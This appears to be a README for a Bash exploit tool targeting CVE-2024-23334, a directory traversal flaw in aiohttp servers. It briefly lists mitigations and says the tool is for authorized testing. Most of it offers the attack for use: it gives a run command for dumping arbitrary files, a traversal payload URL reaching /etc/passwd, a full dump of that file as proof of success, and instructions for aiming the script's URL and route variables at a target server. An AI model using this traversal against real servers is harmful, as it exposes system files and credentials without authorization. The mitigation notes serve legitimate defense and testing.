A Bash script to automate Local File Inclusion (LFI) attacks on vulnerable aiohttp servers, specifically targeting CVE-2024-23334. This exploit allows for unauthorized access to arbitrary files on systems running affected versions of aiohttp with improperly configured static routes.
The CVE-2024-23334 vulnerability affects the aiohttp asynchronous HTTP client/server framework for Python and asyncio. It arises when aiohttp is used as a web server with static routes, which can create directory traversal vulnerabilities if misconfigured. This allows an attacker to access arbitrary files on the system without authorization.
Mitigations for this vulnerability include:
- Upgrading to aiohttp version 3.9.2 or later, where the issue is resolved.
- Disabling the
follow_symlinksoption in the server configuration. - Using a reverse proxy to prevent direct access to sensitive files.
- Automates directory traversal attacks up to 15 levels to reach targeted files.
- Provides feedback on server availability and verifies successful file access.
- Configurable payload paths for adapting the script to specific testing environments.
curl: Ensurecurlis installed on your system, as it is used for making HTTP requests.
To execute the script, run the following command:
./lfi_aiohttp.sh -f /path/to/file/to/dump
If all goes well you should see a result similar to:
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
[+] File dumped successfully.Important: The
main_urlandpayloadvariables in the script may need to be adjusted depending on the target environment.
main_url: This variable should be set to the URL of the target aiohttp server (e.g.,http://localhost:8080). Modify it according to the actual server address you're testing against.payload: This variable represents the static file route on the server (e.g.,/assets/). Ensure this path matches the configuration of the target server's static file directory.
Before running the script, review these variables to ensure they are correctly configured for your testing scenario. Incorrect settings may result in failed attempts to access files or unintended behavior.
- -f: Specifies the file to dump from the server.
- -h: Displays the help panel with usage instructions.
This script is intended for educational purposes and authorized penetration testing only. Unauthorized use of this script is prohibited and may be illegal.